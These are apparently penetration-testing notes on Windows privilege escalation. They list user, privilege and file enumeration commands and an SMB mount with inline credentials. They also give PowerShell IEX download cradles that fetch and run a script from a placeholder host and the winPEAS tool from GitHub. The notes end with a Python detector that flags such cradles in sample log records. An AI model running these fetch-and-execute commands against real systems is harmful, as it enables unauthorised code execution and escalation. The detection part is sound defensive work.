Windows Privilege Escalation

System Enumeration

List Users

net user

User Privileges

whoami /priv

Search Files

If you don't know the full path of the file, or even its extension, wrap the part of the name you do know in wildcards: *<FILE>*

dir /s /b *<FILE>*

/s recurses into subdirectories and /b prints bare paths; run it from the root of the drive to search the whole volume.

List Recursive Directories (PowerShell)

Get-ChildItem . -Recurse -Force -Name -Filter "<filter>" | ForEach-Object { Get-ChildItem -Force $_ }

Mount an SMB share as a network drive

net use z: \\<ip>\<share> /user:<user> <pass>

Execute Remote PowerShell Script

IEX(New-Object Net.WebClient).downloadString('http://<ip>/script.ps1')

powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
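As an added example (not part of the original notes), the defender's view of the download cradle shown above: a check over constructed records modelled on PowerShell script block logging (Event ID 4104, ScriptBlockText) that flags script blocks combining an execution primitive with a remote download, extracts the URL, and labels the winPEAS case from this page. The event records, user names and the 10.0.0.5 address are constructed.

```python
import re

# Constructed sample records modelled on PowerShell script block logging
# (Event ID 4104, ScriptBlockText). Illustrative only, not captured data.
SAMPLE_EVENTS = [
    {"id": 1, "user": r"WS01\alice",
     "script": "Get-ChildItem -Recurse -Force -Name -Filter '*.config'"},
    {"id": 2, "user": r"WS01\bob",
     "script": "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.5/script.ps1')"},
    {"id": 3, "user": r"WS01\bob",
     "script": "powershell \"IEX(New-Object Net.WebClient).downloadString("
               "'https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\""},
    {"id": 4, "user": r"WS01\carol",
     "script": "Invoke-WebRequest -Uri https://intranet.example/report.csv -OutFile r.csv"},
    {"id": 5, "user": r"WS01\dave",
     "script": "iex (iwr 'http://10.0.0.5/a.ps1' -UseBasicParsing).Content"},
]

# Execution primitive: the fetched text is handed straight to the interpreter.
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)
# Download primitive: how the text arrives. Requiring both halves in one
# script block is what separates a cradle from an ordinary file download.
DOWNLOAD_RE = re.compile(
    r"(net\.webclient.*?\.download(string|data)|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
# Tool names worth labelling in a finding; winPEAS is the one this page shows.
KNOWN_TOOLS = ("winpeas",)


def find_download_cradles(events: list[dict]) -> list[dict]:
    """Return one finding per script block that both downloads and executes remote text."""
    findings = []
    for ev in events:
        text = ev["script"]
        if not (EXEC_RE.search(text) and DOWNLOAD_RE.search(text)):
            continue
        urls = URL_RE.findall(text)
        tool = next((t for t in KNOWN_TOOLS if any(t in u.lower() for u in urls)), None)
        findings.append({"id": ev["id"], "user": ev["user"], "urls": urls, "tool": tool})
    return findings


if __name__ == "__main__":
    for f in find_download_cradles(SAMPLE_EVENTS):
        label = f" [{f['tool']}]" if f["tool"] else ""
        print(f"event {f['id']} {f['user']}: {', '.join(f['urls'])}{label}")
```

Event 4 is a plain download with no execution primitive and is deliberately not flagged; feed the function real 4104 ScriptBlockText values to use it against a host's own log.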
